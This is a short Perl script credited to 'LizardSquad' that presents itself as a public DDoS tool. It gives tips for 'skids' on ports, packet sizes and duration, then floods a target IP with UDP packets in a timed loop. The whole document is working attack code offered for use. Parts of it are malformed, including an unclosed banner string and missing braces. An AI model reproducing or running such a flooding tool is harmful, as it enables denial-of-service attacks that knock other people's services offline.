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#Created by #LizardSquad Private Release
#Reccomendations (For skids):
#IP - Don't DDoS Government Websites.
#Port - Use '80' for HTTP (Most Common) or '53' for DNS or '443' for https.
#Size - Use '100 - 1000' (Reccomended).
#Time - Depending on the bandwith of your server, use how ever much you want (Yo
u can always press Ctrl-C to cancel).
use Socket;
use strict;
print '



|__ $$__/

| $$

/$$__ $$

| $$/$$ /$$ /$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$| $$ \ $$/$$$$$$$ /$$$$
$$ \'s (PUBLIC) DDoS Script ;)
| $| $$ | $$ | $$/$$__ $| $$__ $|_ $$_/ | $$ | $| $$ | $| $$__ $$/$$__
| $| $$ | $$ | $| $$$$$$$| $$ \ $$ | $$ | $$ | $| $$ | $| $$ \ $| $$$$$
| $| $$ | $$ | $| $$_____| $$ | $$ | $$ /$| $$ | $| $$ | $| $$ | $| $$___
| $| $$$$$/$$$$| $$$$$$| $$ | $$ | $$$$| $$$$$$| $$$$$$| $$ | $| $$$$
|__/\_____/\___/ \_______|__/ |__/ \___/ \____ $$\______/|__/ |__/\_____
/$$ | $$
| $$$$$$/
print "\n";
if ($#ARGV != 3) {
print "\n\t\t\t***Error command must recieve four arguements***\n";
print "-Ex) perl 80 1000 300\n";
print "-Therefore DDoSing the IP '' for '300' seconds on port '80' usin
g '1000' packets\n\n";
my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print "~To cancel the attack press \'Ctrl-C\'\n\n";
print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
print "To cancel the attack press 'Ctrl-C'\n" unless $time;
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1500-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;

send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}

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